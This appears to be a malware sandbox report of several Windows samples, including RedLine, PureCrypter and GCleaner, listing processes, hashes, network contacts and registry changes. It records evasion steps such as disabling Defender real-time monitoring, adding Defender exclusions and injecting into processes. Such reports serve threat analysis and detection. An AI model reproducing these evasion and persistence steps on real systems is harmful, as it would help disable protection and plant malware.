| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = … | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = … | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = … | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = … | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe
"C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe"
C:\Users\Admin\AppData\Local\setup10298.exe
C:\Users\Admin\AppData\Local\setup10298.exe hhwnd=589872 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe
.\GenericSetup.exe hhwnd=589872 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN
C:\Users\Admin\AppData\Local\setup10298.exe
C:\Users\Admin\AppData\Local\setup10298.exe hready
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe
.\GenericSetup.exe hready
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1288 -ip 1288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 3572
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.dlsft.com | udp |
| N/A | 35.190.60.70:443 | www.dlsft.com | tcp |
| N/A | 35.190.60.70:443 | www.dlsft.com | tcp |
| N/A | 8.8.8.8:53 | dlsft.com | udp |
| N/A | 35.190.60.70:80 | dlsft.com | tcp |
| N/A | 35.190.60.70:80 | dlsft.com | tcp |
| N/A | 8.8.8.8:53 | flow.lavasoft.com | udp |
| N/A | 104.18.88.101:443 | flow.lavasoft.com | tcp |
| N/A | 8.8.8.8:53 | sos.adaware.com | udp |
| N/A | 104.16.235.79:443 | sos.adaware.com | tcp |
| N/A | 104.16.235.79:443 | sos.adaware.com | tcp |
| N/A | 104.16.235.79:443 | sos.adaware.com | tcp |
| N/A | 93.184.221.240:80 | N/A | tcp |
| N/A | 93.184.221.240:80 | N/A | tcp |
| N/A | 104.80.225.205:443 | N/A | tcp |
| N/A | 8.8.8.8:53 | 226.101.242.52.in-addr.arpa | udp |
| N/A | 8.253.208.121:80 | N/A | tcp |
| N/A | 8.253.208.121:80 | N/A | tcp |
Files
memory/5040-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\setup10298.exe
| MD5 | 369acf60d8b5ed6168c74955ee04654f |
| SHA1 | 1753fff63efa6ed5ad30ede6b959261ac67dd13e |
| SHA256 | 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632 |
| SHA512 | 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643 |
C:\Users\Admin\AppData\Local\setup10298.exe
| MD5 | 369acf60d8b5ed6168c74955ee04654f |
| SHA1 | 1753fff63efa6ed5ad30ede6b959261ac67dd13e |
| SHA256 | 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632 |
| SHA512 | 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643 |
memory/1288-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe
| MD5 | 85b0a721491803f8f0208a1856241562 |
| SHA1 | 90beb8d419b83bd76924826725a14c03b3e6533f |
| SHA256 | 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345 |
| SHA512 | 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71 |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe.config
| MD5 | fd63ee3928edd99afc5bdf17e4f1e7b6 |
| SHA1 | 1b40433b064215ea6c001332c2ffa093b1177875 |
| SHA256 | 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9 |
| SHA512 | 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4 |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe
| MD5 | 85b0a721491803f8f0208a1856241562 |
| SHA1 | 90beb8d419b83bd76924826725a14c03b3e6533f |
| SHA256 | 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345 |
| SHA512 | 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71 |
memory/1288-139-0x00000000009C0000-0x00000000009CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
memory/1288-143-0x00000000052A0000-0x00000000052AC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
memory/1288-147-0x0000000005D50000-0x000000000642A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
memory/1288-151-0x00000000056B0000-0x00000000056D8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
memory/1288-155-0x0000000005770000-0x000000000579C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
memory/1288-156-0x0000000005A00000-0x0000000005A66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Core.dll
| MD5 | f931e960cc4ed0d2f392376525ff44db |
| SHA1 | 1895aaa8f5b8314d8a4c5938d1405775d3837109 |
| SHA256 | 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870 |
| SHA512 | 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0 |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Core.dll
| MD5 | f931e960cc4ed0d2f392376525ff44db |
| SHA1 | 1895aaa8f5b8314d8a4c5938d1405775d3837109 |
| SHA256 | 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870 |
| SHA512 | 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0 |
memory/1288-160-0x0000000005CF0000-0x0000000005D02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Core.dll
| MD5 | f931e960cc4ed0d2f392376525ff44db |
| SHA1 | 1895aaa8f5b8314d8a4c5938d1405775d3837109 |
| SHA256 | 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870 |
| SHA512 | 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0 |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Newtonsoft.Json.dll
| MD5 | 3c4d2f6fd240dc804e10bbb5f16c6182 |
| SHA1 | 30d66e6a1ead9541133bad2c715c1971ae943196 |
| SHA256 | 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e |
| SHA512 | 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Newtonsoft.Json.dll
| MD5 | 3c4d2f6fd240dc804e10bbb5f16c6182 |
| SHA1 | 30d66e6a1ead9541133bad2c715c1971ae943196 |
| SHA256 | 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e |
| SHA512 | 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Newtonsoft.Json.dll
| MD5 | 3c4d2f6fd240dc804e10bbb5f16c6182 |
| SHA1 | 30d66e6a1ead9541133bad2c715c1971ae943196 |
| SHA256 | 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e |
| SHA512 | 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d |
memory/1288-164-0x0000000006EF0000-0x0000000006F6C000-memory.dmp
memory/1288-165-0x0000000007B30000-0x00000000080D4000-memory.dmp
memory/1288-166-0x0000000007860000-0x00000000078F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\GenericSetup.exe_1673806433\sciter32.dll
| MD5 | b431083586e39d018e19880ad1a5ce8f |
| SHA1 | 3bbf957ab534d845d485a8698accc0a40b63cedd |
| SHA256 | b525fdcc32c5a359a7f5738a30eff0c6390734d8a2c987c62e14c619f99d406b |
| SHA512 | 7805a3464fcc3ac4ea1258e2412180c52f2af40a79b540348486c830a20c2bbed337bbf5f4a8926b3ef98c63c87747014f5b43c35f7ec4e7a3693b9dbd0ae67b |
C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Extension.dll
| MD5 | 28f1996059e79df241388bd9f89cf0b1 |
| SHA1 | 6ad6f7cde374686a42d9c0fcebadaf00adf21c76 |
| SHA256 | c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce |
| SHA512 | 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29 |
memory/1288-171-0x00000000065A0000-0x00000000065CE000-memory.dmp
memory/2036-172-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\setup10298.exe
| MD5 | 369acf60d8b5ed6168c74955ee04654f |
| SHA1 | 1753fff63efa6ed5ad30ede6b959261ac67dd13e |
| SHA256 | 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632 |
| SHA512 | 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643 |
memory/856-174-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe
| MD5 | 85b0a721491803f8f0208a1856241562 |
| SHA1 | 90beb8d419b83bd76924826725a14c03b3e6533f |
| SHA256 | 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345 |
| SHA512 | 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71 |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe.config
| MD5 | fd63ee3928edd99afc5bdf17e4f1e7b6 |
| SHA1 | 1b40433b064215ea6c001332c2ffa093b1177875 |
| SHA256 | 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9 |
| SHA512 | 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4 |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
Analysis: behavioral3
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win7-20220812-en
Max time kernel
145s
Max time network
143s
Command Line
Signatures
PureCrypter
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | falcaoliderfm.com.br | udp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
Files
memory/1120-54-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
| MD5 | d57db4d9896f6a1b0f72e4503ba94ed0 |
| SHA1 | e4dc13b4c7ee490bd268e2241f8812cb3e3d5744 |
| SHA256 | 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d |
| SHA512 | ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52 |
memory/1120-57-0x0000000000EE0000-0x0000000000EE8000-memory.dmp
memory/1120-58-0x0000000075DF1000-0x0000000075DF3000-memory.dmp
memory/1120-59-0x0000000004855000-0x0000000004866000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:17
Platform
win10v2004-20221111-en
Max time kernel
159s
Max time network
214s
Command Line
Signatures
RedLine
Uses the VBS compiler for execution
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3596 set thread context of 3048 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe
"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3596 -ip 3596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 308
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 308
Network
| Country | Destination | Domain | Proto |
| N/A | 72.21.91.29:80 | N/A | tcp |
| N/A | 93.184.221.240:80 | N/A | tcp |
| N/A | 51.11.192.48:443 | N/A | tcp |
| N/A | 104.80.225.205:443 | N/A | tcp |
| N/A | 8.8.8.8:53 | 176.122.125.40.in-addr.arpa | udp |
| N/A | 82.115.223.46:57672 | N/A | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win7-20221111-en
Max time kernel
158s
Max time network
164s
Command Line
Signatures
GCleaner
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | C:\Windows\SysWOW64\reg.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\FZMYpcBymcbXiuVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WyuevociGfNU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XxxUzwYQU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OdCkbftzuRPDCLooswR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NxGlAgQUfzUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WyuevociGfNU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XxxUzwYQU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
